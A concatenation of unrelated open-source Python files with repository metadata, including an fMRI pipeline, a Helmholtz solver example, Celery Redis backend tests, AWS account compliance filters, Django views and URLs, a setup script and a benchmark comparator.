modelfit.inputs.inputspec.contrasts = [cont1, cont2, cont3]
registration = create_reg_workflow()
registration.inputs.inputspec.target_image = fsl.Info.standard_image('MNI152_T1_2mm.nii.gz')
registration.inputs.inputspec.target_image_brain = fsl.Info.standard_image('MNI152_T1_2mm_brain.nii.gz')
registration.inputs.inputspec.config_file = 'T1_2_MNI152_2mm'
"""
Set up complete workflow
========================
"""
l1pipeline = pe.Workflow(name="level1")
l1pipeline.base_dir = os.path.abspath('./fsl_feeds/workingdir')
l1pipeline.config = {"execution": {"crashdump_dir": os.path.abspath('./fsl_feeds/crashdumps')}}
l1pipeline.connect(datasource, 'func', preproc, 'inputspec.func')
l1pipeline.connect(preproc, 'outputspec.highpassed_files', modelspec, 'functional_runs')
l1pipeline.connect(preproc, 'outputspec.motion_parameters', modelspec, 'realignment_parameters')
l1pipeline.connect(modelspec, 'session_info', modelfit, 'inputspec.session_info')
l1pipeline.connect(preproc, 'outputspec.highpassed_files', modelfit, 'inputspec.functional_data')
l1pipeline.connect(preproc, 'outputspec.mean', registration, 'inputspec.mean_image')
l1pipeline.connect(datasource, 'struct', registration, 'inputspec.anatomical_image')
l1pipeline.connect(modelfit, 'outputspec.zfiles', registration, 'inputspec.source_files')
"""
Setup the datasink
"""
datasink = pe.Node(interface=nio.DataSink(parameterization=False), name="datasink")
datasink.inputs.base_directory = os.path.abspath('./fsl_feeds/l1out')
datasink.inputs.substitutions = [('fmri_dtype_mcf_mask_smooth_mask_gms_mean_warp', 'meanfunc')]
# store relevant outputs from various stages of the 1st level analysis
l1pipeline.connect(registration, 'outputspec.transformed_files', datasink, 'level1.@Z')
l1pipeline.connect(registration, 'outputspec.transformed_mean', datasink, 'meanfunc')
"""
Execute the pipeline
--------------------
The code discussed above sets up all the necessary data structures with
appropriate parameters and the connectivity between the processes, but does not
generate any output. To actually run the analysis on the data the
``nipype.pipeline.engine.Pipeline.Run`` function needs to be called.
"""
if __name__ == '__main__':
l1pipeline.run()
|
pombreda/pyamg | Examples/ComplexSymmetric/one_D_helmholtz.py | Python | bsd-3-clause | 3,892 | 0.014132 | from numpy import array, zeros, ones, sqrt, ravel, mod, random, inner, conjugate
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix, bmat, eye
from scipy import rand, mat, real, imag, linspace, hstack, vstack, exp, cos, sin, pi
from pyamg.util.linalg import norm
import pyamg
from scipy.optimize import fminbound, fmin
__all__ = ['one_D_helmholtz', 'min_wave']
def min_wave(A, omega, x, tol=1e-5, maxiter=25):
'''
parameters
----------
A {matrix}
1D Helmholtz Operator
omega {scalar}
Wavenumber used to discretize Helmholtz problem
x {array}
1D mesh for the problem
tol {scalar}
minimization tolerance
maxit {integer}
maximum iters for minimization algorithm
returns
-------
Applies minimization algorithm to find numerically lowest energy wavenumber
for the matrix A, i.e., the omega shift that minimizes <Ac, c> / <c, c>,
for c = cosine((omega+shift)x)
'''
x = ravel(x)
# Define scalar objective function, ignoring the
# boundaries by only considering A*c at [1:-1]
def obj_fcn(alpha):
c = cos((omega+alpha)*x)
Ac = (A*c)[1:-1]
return norm(Ac)/norm(c[1:-1])
(xopt, fval, ierr, numfunc) = fminbound(obj_fcn, -0.99*omega, \
0.99*omega, xtol=tol, maxfun=maxiter, full_output=True, disp=0)
#print "Minimizer = %1.4f, Function Value at Min = %1.4e\nError Flag = %d,\
# Number of function evals = %d" % (xopt, fval, ierr, numfunc)
return xopt
def one_D_helmholtz(h, omega=1.0, nplane_waves=2):
'''
parameters
----------
h {int}
Number of grid spacings for 1-D Helmholtz
omega {float}
Defines Helmholtz wave number
nplane_waves {int}
Defines the number of planewaves used for the near null-space modes, B.
1: B = [ exp(ikx) ]
2: B = [ real(exp(ikx)), complex(exp(ikx)) ]
returns
-------
dictionary containing:
A {matrix-like}
LHS of linear system for Helmholtz problem,
-laplace(u) - omega^2 u = f
mesh_h {float}
mesh size
vertices {array-like}
[X, Y]
elements {None}
None, just using 1-D finite-differencing
'''
# Ensure Repeatability of "random" initial guess
random.seed(10)
# Mesh Spacing
mesh_h = 1.0/(float(h)-1.0)
# Construct Real Operator
| reA = pyamg.gallery.poisson( (h,), format='csr')
reA = reA - mesh_h*mesh_h*omega*omega*\
eye(reA.shape[0], reA.shape[1], format='csr')
dimen = reA.shape[0]
# Construct Ima | ginary Operator
imA = csr_matrix( coo_matrix( (array([2.0*mesh_h*omega]), \
(array([0]), array([0]))), shape=reA.shape) )
# Enforce Radiation Boundary Conditions at first grid point
reA.data[1] = -2.0
# In order to maintain symmetry scale the first equation by 1/2
reA.data[0] = 0.5*reA.data[0]
reA.data[1] = 0.5*reA.data[1]
imA.data[0] = 0.5*imA.data[0]
# Create complex-valued system
complexA = reA + 1.0j*imA
# For this case, the CG (continuous Galerkin) case is the default elements and vertices
# because there is no DG mesh to speak of
elements = None
vertices = hstack((linspace(-1.0,1.0,h).reshape(-1,1), zeros((h,1))))
# Near null-space modes are 1-D Plane waves: [exp(ikx), i exp(ikx)]
B = zeros( (dimen, nplane_waves), dtype=complex )
shift = min_wave(complexA, omega, vertices[:,0], tol=1e-9, maxiter=15)
if nplane_waves == 1:
B[:,0] = exp(1.0j*(omega+shift)*vertices[:,0])
elif nplane_waves == 2:
B[:,0] = cos((omega+shift)*vertices[:,0])
B[:,1] = sin((omega+shift)*vertices[:,0])
return {'A' : complexA, 'B' : B, 'mesh_h' : mesh_h, \
'elements' : elements, 'vertices' : vertices}
|
kawamon/hue | desktop/core/ext-py/celery-4.2.1/t/unit/backends/test_redis.py | Python | apache-2.0 | 23,661 | 0.000042 | from __future__ import absolute_import, unicode_literals
import random
import ssl
from contextlib import contextmanager
from datetime import timedelta
from pickle import dumps, loads
import pytest
from case import ANY, ContextMock, Mock, call, mock, patch, skip
from celery import signature, states, uuid
from celery.canvas import Signature
from celery.exceptions import (ChordError, CPendingDeprecationWarning,
ImproperlyConfigured)
from celery.utils.collections import AttributeDict
def raise_on_second_call(mock, exc, *retval):
def on_first_call(*args, **kwargs):
mock.side_effect = exc
return mock.return_value
mock.side_effect = on_first_call
if retval:
mock.return_value, = retval
class Connection(object):
connected = True
def disconnect(self):
self.connected = False
class Pipeline(object):
def __init__(self, client):
self.client = client
self.steps = []
def __getattr__(self, attr):
def add_step(*args, **kwargs):
self.steps.append((getattr(self.client, attr), args, kwargs))
return self
return add_step
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
def execute(self):
return [step(*a, **kw) for step, a, kw in self.steps]
class Redis(mock.MockCallbacks):
Connection = Connection
Pipeline = Pipeline
def __init__(self, host=None, port=None, db=None, password=None, **kw):
self.host = host
self.port = port
self.db = db
self.password = password
self.keyspace = {}
self.expiry = {}
self.connection = self.Connection()
def get(self, key):
return self.keyspace.get(key)
def setex(self, key, expires, value):
self.set(key, value)
self.expire(key, expires)
def set(self, key, value):
self.keyspace[key] = value
def expire(self, key, expires):
self.expiry[key] = expires
return expires
def delete(self, key):
return bool(self.keyspace.pop(key, None))
def pipeline(self):
return self.Pipeline(self)
def _get_list(self, key):
try:
return self.keyspace[key]
except KeyError:
l = self.keyspace[key] = []
return l
def rpush(self, key, value):
self._get_list(key).append(value)
def lrange(self, key, start, stop):
return self._get_list(key)[start:stop]
def llen(self, key):
return len(self.keyspace.get(key) or [])
class Sentinel(mock.MockCallbacks):
def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None,
**connection_kwargs):
self.sentinel_kwargs = sentinel_kwargs
self.sentinels = [Redis(hostname, port, **self.sentinel_kwargs)
for hostname, port in sentinels]
self.min_other_sentinels = min_other_sentinels
self.connection_kwargs = connection_kwargs
def master_for(self, service_name, redis_class):
return random.choice(self.sentinels)
class redis(object):
StrictRedis = Redis
class ConnectionPool(object):
def __init__(self, **kwargs):
pass
class UnixDomainSocketConnection(object):
def __init__(self, **kwargs):
pass
class sentinel(object):
Sentinel = Sentinel
class test_RedisResultConsumer:
def get_backend(self):
from celery.backends.redis import RedisBackend
class _RedisBackend(RedisBackend):
redis = redis
return _RedisBackend(app=self.app)
def get_consumer(self):
return self.get_backend().result_consumer
@patch('celery.backends.async.BaseResultConsumer.on_after_fork')
def test_on_after_fork(self, parent_method):
consumer = self.get_consumer()
consumer.start('none')
consumer.on_after_fork()
parent_method.assert_called_once()
consumer.backend.client.connection_pool.reset.assert_called_once()
consumer._pubsub.close.assert_called_once()
# PubSub instance not initialized - exception would be raised
# when calling .close()
consumer._pubsub = None
parent_method.reset_mock()
consumer.backend.client.connection_pool.reset.reset_mock()
consumer.on_after_fork()
parent_method.assert_called_once()
consumer.backend.client.connection_pool.reset.assert_called_once()
# Continues on KeyError
consumer._pubsub = Mock()
consumer._pubsub.close = Mock(side_effect=KeyError)
parent_method.reset_mock()
consumer.backend.client.connection_pool.reset.reset_mock()
consumer.on_after_fork()
parent_method.assert_called_once()
@patch('celery.backends.redis.ResultConsumer.cancel_for')
@patch('celery.backends.async.BaseResultConsumer.on_state_change')
def test_on_state_change(self, parent_method, cancel_for):
consumer = self.get_consumer()
meta = {'task_id': 'testing', 'status': states.SUCCESS}
message = 'hello'
consumer.on_state_change(meta, message)
parent_method.assert_called_once_with(meta, message)
cancel_for.assert_called_once_with(meta['task_id'])
# Does not call cancel_for for other states
meta = {'task_id': 'testing2', 'status': states.PENDING}
parent_method.reset_mock()
cancel_for.reset_mock()
consumer.on_state_change(meta, message)
parent_method.assert_called_once_with(meta, message)
cancel_for.assert_not_called()
class test_RedisBackend:
def get_backend(self):
from celery.backends.redis import RedisBackend
class _RedisBackend(RedisBackend):
redis = redis
return _RedisBackend
def get_E_LOST(self):
from celery.backends.redis import E_LOST
return E_LOST
def setup(self):
self.Backend = self.get_backend()
self.E_LOST = self.get_E_LOST()
self.b = self.Backend(app=self.app)
@pytest.mark.usefixtures('depends_on_current_app')
@skip.unless_module('redis')
def test_reduce(self):
from celery.backends.redis import RedisBackend |
x = RedisBackend(app=self.app)
assert loads(dumps(x))
def test_no_redis(self):
self. | Backend.redis = None
with pytest.raises(ImproperlyConfigured):
self.Backend(app=self.app)
def test_url(self):
self.app.conf.redis_socket_timeout = 30.0
self.app.conf.redis_socket_connect_timeout = 100.0
x = self.Backend(
'redis://:bosco@vandelay.com:123//1', app=self.app,
)
assert x.connparams
assert x.connparams['host'] == 'vandelay.com'
assert x.connparams['db'] == 1
assert x.connparams['port'] == 123
assert x.connparams['password'] == 'bosco'
assert x.connparams['socket_timeout'] == 30.0
assert x.connparams['socket_connect_timeout'] == 100.0
def test_timeouts_in_url_coerced(self):
x = self.Backend(
('redis://:bosco@vandelay.com:123//1?'
'socket_timeout=30&socket_connect_timeout=100'),
app=self.app,
)
assert x.connparams
assert x.connparams['host'] == 'vandelay.com'
assert x.connparams['db'] == 1
assert x.connparams['port'] == 123
assert x.connparams['password'] == 'bosco'
assert x.connparams['socket_timeout'] == 30
assert x.connparams['socket_connect_timeout'] == 100
def test_socket_url(self):
self.app.conf.redis_socket_timeout = 30.0
self.app.conf.redis_socket_connect_timeout = 100.0
x = self.Backend(
'socket:///tmp/redis.sock?virtual_host=/3', app=self.app,
)
assert x.connparams
assert x.connparams['path'] == '/tmp/redis.sock'
assert (x.connparams['connection_class'] is
redis.UnixDomainSocketConnection)
assert 'host' not in x.connparams
assert 'port' not in x.connparams
assert x.connparams['socket_timeou |
pddg/Qkou_kit | lib/add_db.py | Python | mit | 2,046 | 0 | # coding: utf-8
import db_info
import db_cancel
import db_news
import hashlib
from tweeter import format_info, format_cancel, format_news
import settings
log = settings.log
def add_info_to_queue(q, *args):
try:
# 更新した数をカウント
updated = 0
for lec_info in args:
id = db_info.add_info(*lec_info)
if id is not False:
lec_info.append(id)
# Tweetする用に文章をフォーマット
t = format_info(*lec_info)
# キューに投入
q.put(t)
updated += 1
else:
pass
else:
# 更新した数を返す
return updated
except Exception as e:
log.exception(e)
def add_cancel_to_queue(q, *args):
try:
# 更新した数をカウント
updated = 0
for lec_cancel in args:
cancel_id = db_cancel.add_cancel(*lec_cancel)
if cancel_id is not False:
lec_cancel.append(cancel_id)
# Tweetする用に文章をフォーマット
t = format_cancel(*lec_cancel)
| # キューに投入
| q.put(t)
updated += 1
else:
pass
else:
# 更新数を返す
return updated
except Exception as e:
log.exception(e)
def add_news_to_queue(q, *args):
try:
# 更新した数をカウント
updated = 0
for news in args:
news_id = db_news.add_news(*news)
if news_id is not False:
news.append(news_id)
# Tweetする用に文章をフォーマット
t = format_news(*news)
# キューに投入
q.put(t)
updated += 1
else:
pass
else:
# 更新数を返す
return updated
except Exception as e:
log.exception(e)
|
jimmyraywv/cloud-custodian | c7n/resources/account.py | Python | apache-2.0 | 35,461 | 0.00079 | # Copyright 2016-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""AWS Account as a custodian resource.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from botocore.exceptions import ClientError
from datetime import datetime, timedelta
from dateutil.parser import parse as parse_date
from dateutil.tz import tzutc
from c7n.actions import ActionRegistry, BaseAction
from c7n.filters import Filter, FilterRegistry, ValueFilter, FilterValidationError
from c7n.manager import ResourceManager, resources
from c7n.utils import local_session, type_schema
from c7n.resources.iam import CredentialReport
filters = FilterRegistry('aws.account.actions')
actions = ActionRegistry('aws.account.filters')
def get_account(session_factory, config):
session = local_session(session_factory)
client = session.client('iam')
aliases = client.list_account_aliases().get(
'AccountAliases', ('',))
name = aliases and aliases[0] or ""
return {'account_id': config.account_id,
'account_name': name}
@resources.register('account')
class Account(ResourceManager):
filter_registry = filters
action_registry = actions
class resource_type(object):
id = 'account_id'
name = 'account_name'
filter_name = None
@classmethod
def get_permissions(cls):
return ('iam:ListAccountAliases',)
def get_model(self):
return self.resource_type
def resources(self):
return self.filter_resources([get_account(self.session_factory, self.config)])
def get_resources(self, resource_ids):
return [get_account(self.session_factory, self.config)]
@filters.register('credential')
class AccountCredentialReport(CredentialReport):
def process(self, resources, event=None):
super(AccountCredentialReport, self).process(resources, event)
report = self.get_credential_report()
if report is None:
return []
results = []
info = report.get('<root_account>')
for r in resources:
if self.match(info):
r['c7n:credential-report'] = info
results.append(r)
return results
@filters.register('check-cloudtrail')
class CloudTrailEnabled(Filter):
"""Verify cloud trail enabled for this account per specifications.
Returns an annotated account resource if trail is not enabled.
Of particular note, the current-region option will evaluate whether cloudtrail is available
in the current region, either as a multi region trail or as a trail with it as the home region.
:example:
.. code-block: yaml
policies:
- name: account-cloudtrail-enabled
resource: account
region: us-east-1
filters:
- type: check-cloudtrail
global-events: true
multi-region: true
running: true
"""
schema = type_schema(
'check-cloudtrail',
**{'multi-region': {'type': 'boolean'},
'global-events': {'type': 'boolean'},
'current-region': {'type': 'boolean'},
'running': {'type': 'boolean'},
'notifies': {'type': 'boolean'},
'file-digest': {'type': 'boolean'},
'kms': {'type': 'boolean'},
'kms-key': {'type': 'string'}})
permissions = ('cloudtrail:DescribeTrails', 'cloudtrail:GetTrailStatus')
def process(self, resources, event=None):
session = local_session(self.manager.session_factory)
client = session.client('cloudtrail')
trails = client.describe_trails()['trailList']
resources[0]['c7n:cloudtrails'] = trails
if self.data.get('global-events'):
trails = [t for t in trails if t.get('IncludeGlobalServiceEvents')]
if self.data.get('current-region'):
current_region = session.region_name
trails = [t for t in trails if t.get(
'HomeRegion') == current_region or t.get('IsMultiRegionTrail')]
if self.data.get('kms'):
trails = [t for t in trails if t.get('KmsKeyId')]
if self.data.get('kms-key'):
trails = [t for t in trails
if t.get('KmsKeyId', '') == self.data['kms-key']]
if self.data.get('file-digest'):
trails = [t for t in trails
if t.get('LogFileValidationEnabled')]
if self.data.get('multi-region'):
trails = [t for t in trails if t.get('IsMultiRegionTrail')]
if self.data.get('notifies'):
trails = [t for t in trails if t.get('SNSTopicArn')]
if self.data.get('running', True):
running = []
for t in list(trails):
t['Status'] = status = client.get_trail_status(
Name=t['TrailARN'])
if status['IsLogging'] and not status.get(
'LatestDeliveryError'):
running.append(t)
trails = running
if trails:
return []
return resources
@filters.register('check-config')
class ConfigEnabled(Filter):
"""Is config service enabled for this account
:example:
.. code-block: yaml
policies:
- name: account-check-config-services
resource: account
region: us-east-1
filters:
- type: check-config
all-resources: true
global-resources: true
running: true
"""
schema = type_schema(
'check-config', **{
'all-resources': {'type': 'boolean'},
'running': {'type': 'boolean'},
'global-resources': {'type': 'boolean'}})
permissions = ('config:DescribeDeliveryChannels',
'config:DescribeConfigurationRecorders',
'config:DescribeConfigurationRecorderStatus')
def process(self, resources, event=None):
client = local_session(
self.manager.session_factory).client('config')
channels = client.describe_delivery_channels()[
'DeliveryChannels']
recorders = client.describe_configuration_recorders()[
'ConfigurationRecorders']
resources[0]['c7n:config_recorders'] = recorders
resources[0]['c7n:config_channels'] = channels
if self.data.get('global-resources'):
recorders = [
r for r in recorders
if r['recordingGroup'].get('includeGlobalResourceTypes')]
if self.data.get('all-resources'):
recorders = [r for r in recorders
if r['recordingGroup'].get('allSupported')]
if self.data.get('running', T | rue) and recorders:
status = {s['name']: s for
s in client.describe_configuration_recorder_status(
)['ConfigurationRecordersStatus']}
resources[0]['c7n:config_status'] = status
recorders = [r for r in recorders if status[r['name']]['recording'] and
status[r['n | ame']]['lastStatus'].lower() in ('pending', 'success')]
if channels and recorders:
return []
return resources
@filters.register('iam-summary')
class IAMSummary(ValueFilter):
"""Return annotated account resource if iam summary filter matches.
Some use cases include, detecting root api keys or mfa usage.
Example iam summary wrt to matchable fields::
{
"AccessKeysPerUserQuota": 2,
"AccountAcc |
spandanb/horizon | openstack_dashboard/dashboards/admin/images/urls.py | Python | apache-2.0 | 1,311 | 0.000763 | # Cop | yright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights | Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import patterns # noqa
from django.conf.urls import url # noqa
from openstack_dashboard.dashboards.admin.images import views
urlpatterns = patterns('openstack_dashboard.dashboards.admin.images.views',
url(r'^images/$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(r'^(?P<image_id>[^/]+)/update/$',
views.UpdateView.as_view(), name='update'),
url(r'^(?P<image_id>[^/]+)/detail/$',
views.DetailView.as_view(), name='detail')
)
|
slozier/ironpython2 | Tests/interop/net/loadorder/t3g1.py | Python | apache-2.0 | 833 | 0.004802 | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
| from iptest.assert_util import *
add_clr_assemblies("loadorder_3")
# namespace First {
# public class Generic1<K, V> {
# public static string Flag = typeof(Generic1<,>).FullName;
| # }
# }
import First
AreEqual(First.Generic1[int, int].Flag, "First.Generic1`2")
add_clr_assemblies("loadorder_3g")
# namespace First {
# public class Generic1<K, V> {
# public static string Flag = typeof(Generic1<,>).FullName + "_Same";
# }
# }
AreEqual(First.Generic1[int, int].Flag, "First.Generic1`2_Same")
from First import *
AreEqual(Generic1[int, int].Flag, "First.Generic1`2_Same")
|
willre/homework | day21-22/source/app01/views.py | Python | gpl-2.0 | 2,803 | 0.013674 | # -*- coding:utf-8 -*-
from django.shortcuts import render
import models
# Create your views here.
class Pager(object):
def __init__(self,current_page):
self.current_page = current_page
@property
def start(self):
return (self.current_page-1)*10
@property
def end(self):
return self.current_page*10
def page_str(self,all_item,base_url):
all_page, div = divmod(all_item,10)
if div>0:
all_page += 1
page_list=[]
# # start = self.current_page-5
# # end = self.current_page+6
# #
# # page_str = ""
# # for i in range(start,end):
# # if i == self.current_page:
# # temp = '<a style="color:red;font-size:32px" href="/user_list/?page=%d"> %d </a>' % (i,i)
# # else:
# # temp = '<a href="/user_list/?page=%d"> %d </a>' % (i,i)
# # page_str += temp
if all_page<=11:
start =1
end = all_page+1
else:
if self.current_page<=6:
start = 1
end =12
else:
start = self.current_page-5
end = self.current_page+6
if self.current_page + 6 >all_page:
start = all_page-11
end = all_page + 1
for i in range(start,end):
if i == self.current_page:
temp = '<a style="color:red;font-size:32px" href="%s%d"> | %d </a>' % (base_url,i,i)
else:
temp = '<a href="%s% | d"> %d </a>' % (base_url,i,i)
page_list.append(temp)
if self.current_page>1:
pre_page = '<a href="%s%d"> 上一页 </a>' % (base_url,self.current_page-1)
else:
pre_page= temp = '<a href="javascript:void(0)"> 上一页 </a>'
if self.current_page>=all_page:
next_page = '<a href="javascript:void(0)"> 下一页 </a>'
else:
next_page = '<a href="%s%d"> 下一页 </a>' % (base_url,self.current_page+1)
page_list.insert(0,pre_page)
page_list.append(next_page)
return "".join(page_list)
def user_list(request):
# for item in range(100):
# models.user_list.objects.create(username="user%d" % item ,age = item)
# print models.user_list.objects.all().count()
current_page =int(request.GET.get("page",1))
# start = (current_page-1)*10
# end = current_page*10
page_obj = Pager(current_page)
result = models.user_list.objects.all()[page_obj.start:page_obj.end]
all_item = models.user_list.objects.all().count()
page_str = page_obj.page_str(all_item,"/user_list/?page=")
return render(request,"user_list.html",{"result":result,"page_str":page_str}) |
thiagopa/thiagopagonha | wiki/models.py | Python | bsd-3-clause | 842 | 0.016687 | #-*- coding: utf-8 -*-
from django.db import models
from django.contrib import admin
from datetime import datetime, timedelta
import pytz
def default_now():
now = datetime.utcnow().replace(tzinfo=pytz.utc)
# Essa merda de UTC só funciona direito na versão 1.4 :(
# Era fazer essa gambi ou modificar o código do nonrel
now = now - timedelta(hours=3)
return now
class Page(models.Model):
name = models.CharField(max_length=60)
title = models.CharField(max_length=60)
data = models.TextField()
updated = models.DateTimeField()
def __unicode__(self):
return self.name
def save(self):
| self.updated = default_now()
su | per(Page, self).save()
class PageAdmin(admin.ModelAdmin):
exclude = ('updated',)
admin.site.register(Page,PageAdmin) |
libcrack/iker | setup.py | Python | gpl-3.0 | 2,536 | 0.001972 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: borja@libcrack.so
# Date: Wed Jan 28 16:35:57 CET 2015
import re
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(relpath):
"""
Return string containing the contents of the file at *relpath* relative to
this file.
"""
cwd = os.path.dirname(__file__)
abspath = os.path.join(cwd,os.path.normpath(relpath))
with open(abspath) as f:
return f.read()
PACKAGE = os.path.basename(os.getcwd())
PACKAGES = [PACKAGE]
PROVIDES = [PACKAGE]
PACKAGE_DIR = {PACKAGE: PACKAGE}
SCRIPT_FILE = PACKAGE_DIR[PACKAGE] + '/__init__.py'
# SCRIPTS=['scripts/' + PACKAGE]
ENTRY_POINTS = {
# 'console_scripts': [PACKAGE + '=' + PACKAGE + '.' + PACKAGE + ':main'],
'console_scripts': ['{0}={0}.{0}:main'.format(PACKAGE)],
}
PLATFORMS = ['Linux']
KEYWORDS = 'ipsec ike'
INSTALL_REQUIRES = [
x.replace('-','_') for x in read('requirements.txt').split('\n') if x != ''
]
# x.replace('-','_') for x in read('requirements.txt').split('\n') if x != ''
main_py = open(SCRIPT_FILE).read()
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", main_py))
docstrings = re.findall('"""(.*?)"""', main_py, re.DOTALL)
VERSION = metadata['version']
WEBSITE = metadata['website']
LICENSE = metadata['license']
AUTHOR_EMAIL = metadata['author']
AUTHOR, EMAIL = re.match(r'(.*) <(.*)>', AUTHOR_EMAIL).groups()
DESCRIPTION = docstrings[0].strip()
if '\n\n' in DESCRIPTION:
DESCRIPTION, LONG_DESCRIPTION = DESCRIPTION.split('\n\n', 1)
else:
LONG_DESCRIPTION = None
CLASSIFIERS = [
'Development Status :: 3 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: GPL',
'Operating System :: OS Independent',
'Operating System :: POSIX :: Linux',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
]
PARAMS = {
'platforms': PLATFORMS,
'name': PACKAGE,
'version': VERSION,
'description': DESCRIPTION,
'keywords': KEYWORDS,
| 'long_description': LONG_DESCRIPTION,
'author': AUTHOR,
'author_email': EMAIL,
'url': WEBSITE,
'license': LICENSE, |
'packages': PACKAGES,
'package_dir': PACKAGE_DIR,
#'scripts': SCRIPTS,
'entry_points': ENTRY_POINTS,
'provides': PROVIDES,
'requires': INSTALL_REQUIRES,
'install_requires': INSTALL_REQUIRES,
'classifiers': CLASSIFIERS,
}
setup(**PARAMS)
# vim:ts=4 sts=4 tw=79 expandtab:
|
google-research/prompt-tuning | prompt_tuning/train/__init__.py | Python | apache-2.0 | 572 | 0.001748 | # Copyright 2022 Google.
#
# Licensed under the Apache License, Version 2.0 (th | e "License");
# you may not use this file except in compliance with the | License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
Bristol-Braille/canute-ui | ui/buttons.py | Python | gpl-3.0 | 3,110 | 0 | import logging
from datetime import datetime
from .actions import actions
from .system_menu.system_menu import system_menu
from .library.buttons import library_buttons
from .book.buttons import book_buttons
from .go_to_page.buttons import go_to_page_buttons
from .bookmarks.buttons import bookmarks_buttons
from .language.buttons import language_buttons
log = logging.getLogger(__name__)
bindings = {
'library': library_buttons,
'book': book_buttons,
'go_to_page': go_to_page_buttons,
'bookmarks_menu': bookmarks_buttons,
'language': language_buttons,
'help_menu': {
'single': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_ | help_menu(),
},
'long': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_help_menu(),
'X': actions.reset_display('start'),
},
},
'system_menu': {
'single': {
'R': actions.toggle_help_menu(),
'>': actions.next_page | (),
'<': actions.previous_page(),
'L': actions.close_menu(),
},
'long': {
'R': actions.toggle_help_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'L': actions.close_menu(),
'X': actions.reset_display('start'),
},
}
}
sys_menu = system_menu()
for i, item in enumerate(sys_menu):
action = sys_menu[item]
bindings['system_menu']['single'][str(i + 2)] = action
async def dispatch_button(key, press_type, state, dispatch):
if state['help_menu']['visible']:
location = 'help_menu'
else:
location = state['location']
try:
action = bindings[location][press_type][key]
except KeyError:
log.debug('no binding for key {}, {} press'.format(key, press_type))
else:
await dispatch(action)
prev_buttons = {}
long_buttons = {}
async def check(driver, state, dispatch):
# this is a hack for now until we change the protocol, we read the buttons
# twice so we don't miss the release of short presses
for _ in range(2):
buttons = driver.get_buttons()
for key in buttons:
up_or_down = buttons[key]
if up_or_down == 'down':
prev_buttons[key] = datetime.now()
elif up_or_down == 'up':
if key in long_buttons:
del long_buttons[key]
del prev_buttons[key]
else:
if key in prev_buttons:
del prev_buttons[key]
await dispatch_button(key, 'single', state, dispatch)
for key in prev_buttons:
diff = (datetime.now() - prev_buttons[key]).total_seconds()
if diff > 0.5:
prev_buttons[key] = datetime.now()
long_buttons[key] = True
await dispatch_button(key, 'long', state, dispatch)
|
renesugar/arrow | dev/archery/archery/benchmark/compare.py | Python | apache-2.0 | 3,878 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Define a global regression threshold as 5%. This is purely subjective and
# flawed. This does not track cumulative regression.
DEFAULT_THRESHOLD = 0.05
class BenchmarkComparator:
""" Compares two benchmarks.
Encodes the logic of comparing two benchmarks and taking a decision on
if it induce a regression.
"""
def __init__(self, contender, baseline, threshold=DEFAULT_THRESHOLD,
suite_name=None):
self.contender = contender
| self.baseline = baseline
self.threshold = threshold
self.suite_name = suite_name
@property
def name(self):
return self.baseline.name
@property
def less_is_better(self):
return self.ba | seline.less_is_better
@property
def unit(self):
return self.baseline.unit
@property
def change(self):
new = self.contender.value
old = self.baseline.value
if old == 0 and new == 0:
return 0.0
if old == 0:
return 0.0
return float(new - old) / abs(old)
@property
def confidence(self):
""" Indicate if a comparison of benchmarks should be trusted. """
return True
@property
def regression(self):
change = self.change
adjusted_change = change if self.less_is_better else -change
return (self.confidence and adjusted_change > self.threshold)
def compare(self, comparator=None):
return {
"benchmark": self.name,
"change": self.change,
"regression": self.regression,
"baseline": self.baseline.value,
"contender": self.contender.value,
"unit": self.unit,
"less_is_better": self.less_is_better,
}
def __call__(self, **kwargs):
return self.compare(**kwargs)
def pairwise_compare(contender, baseline):
dict_contender = {e.name: e for e in contender}
dict_baseline = {e.name: e for e in baseline}
for name in (dict_contender.keys() & dict_baseline.keys()):
yield name, (dict_contender[name], dict_baseline[name])
class RunnerComparator:
""" Compares suites/benchmarks from runners.
